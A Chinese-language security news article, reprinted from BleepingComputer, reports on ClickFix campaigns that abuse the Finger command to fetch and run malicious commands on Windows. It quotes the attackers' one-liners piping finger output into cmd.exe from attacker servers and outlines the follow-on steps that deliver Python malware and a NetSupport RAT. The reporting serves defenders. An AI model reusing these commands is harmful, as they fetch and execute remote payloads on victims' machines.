新聞
觀點
解決方案
活動
訂閱電子報
資安人粉絲團
聯絡我們
關於我們
合作詢問
隱私權政策
香港商法蘭克福展覽有限公司台灣傳媒分公司
110 台北市信義區市民大道六段288號8F
886-2-8729-1099
新聞
觀點
解決方案
活動
訂閱電子報
訂閱電子報
新聞
觀點
解決方案
活動
新聞
您現在位置 : 首頁 >
新聞
駭客濫用數十年前的 Finger 協定發動 ClickFix 攻擊
2025 / 11 / 20
編輯部
數十年歷史的 Finger 指令最近在資安威脅中捲土重來,攻擊者利用此協定在 Windows 裝置上遠端執行惡意命令。
Finger 指令過去用於查詢 Unix 與 Linux 系統上的使用者資訊,後來也被加入 Windows 系統。執行後會回傳使用者的登入名稱、姓名、主目錄、電話號碼、最後登入時間等基本資訊。儘管仍受支援,但與數十年前的普及程度相比,現今已很少被使用。
近期出現多起利用 Finger 協定的惡意攻擊活動,攻擊者透過遠端伺服器取得惡意指令並在受害裝置上執行。
早在 2020 年,研究人員就已警告駭客將 Finger 指令當作 Living Off the Land Binary(LOLBIN)來下載惡意軟體並規避偵測。
攻擊手法解析
10 月,資安研究人員 MalwareHunterTeam 分享了一個批次檔案樣本。該檔案執行後會使用「finger root@finger.nateams[.]com」指令從遠端 Finger 伺服器取得命令,再透過 cmd.exe 在本地執行。
Reddit 上有使用者發文警告遭遇類似攻擊。駭客偽裝成 Captcha 驗證頁面,誘騙受害者執行 Windows 指令來「證明自己是真人」。受害者在命令提示字元中輸入了以下指令:「cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are humanpress ENTER'」。
這種攻擊利用 Finger 協定作為遠端腳本傳遞機制。執行 finger 指令後,輸出內容會被導向 Windows 命令處理器 cmd.exe。取得的命令會執行以下動作:建立隨機命名的路徑、將 curl.exe 複製為隨機檔名、使用重新命名的 curl 下載偽裝成 PDF 的 zip 壓縮檔、解壓縮出 Python 惡意軟體套件。接著使用「pythonw.exe init.py」執行 Python 程式。最後回傳確認訊息給攻擊者伺服器,同時向使用者顯示假的「驗證你是真人」提示。
研究人員發現另一個進化版攻擊,使用「finger Kove2@api.metrics-strange.com | cmd」取得並執行類似指令。
此版本會先檢查受害系統是否存在惡意軟體分析工具,包括 filemon、regmon、procexp、Wireshark、Fiddler、IDA、x64dbg、OllyDbg、ProcessHacker 等
。若未偵測到這些工具,就會下載偽裝成 PDF 的 zip 檔案並解壓縮。不過這次解出的不是 Python 套件,而是 NetSupport Manager 遠端存取木馬(RAT)。攻擊者會設定排程工作,讓惡意軟體在使用者登入時自動啟動。
目前這類 Finger 協定濫用攻擊似乎出自單一駭客發動的 ClickFix 攻擊活動。對防禦者而言,最有效的阻擋方式是封鎖 TCP port 79 的對外流量,因為這是 Finger 協定 daemon 使用的連線埠。
本文轉載自 BleepingComputer。
Finger協定
ClickFix
LOLBIN
最新活動
2026.07.22
2026 政府資安論壇
2026.07.08
AI工具應用資安風險評估管理
2026.07.09
7/9-7/10【軟體開發安全意識與 .NET/Java 安全程式開發】兩日集訓班
2026.07.14
2026迎戰合規新局上市櫃企業資安治理與風險評估實戰解析
2026.07.15
資安新興技術、AI應用與全球發展趨勢解析
2026.07.15
資安新興技術、AI應用與全球發展趨勢解析
2026.07.29
半導體與高科技園區資安防護
2026.07.30
Azure 雲端轉型研討會|雲端 x AI x 資安
看更多活動
大家都在看
超越人類監督:前沿 AI 時代的新挑戰與應對
傳統防火牆只看 IP,語意防火牆看「意圖」:林宜隆教授解析神經符號架構與 AI 治理三標準如何聯手對抗工業化攻擊
群暉科技 Synology 修補 MailPlus Server 三項重大漏洞,逾 2,100 台暴露於網路
PTC Windchill 遠端程式碼執行漏洞納入 KEV 目錄,攻擊者仍持續部署 Web Shell
Sophos 與 Rubrik 攜手推出由 Rubrik Cyber Resilience 技術支援的 Microsoft 365 備份與復原服務
資安人科技網
文章推薦
中國 LLM 漏洞發現能力逼近前沿模型,專家憂攻守差距持續擴大
幻象域名搶註:LLM 幻覺催生新型供應鏈威脅
Microsoft 加速後量子密碼學部署時程,目標 2029 年完成關鍵產品移轉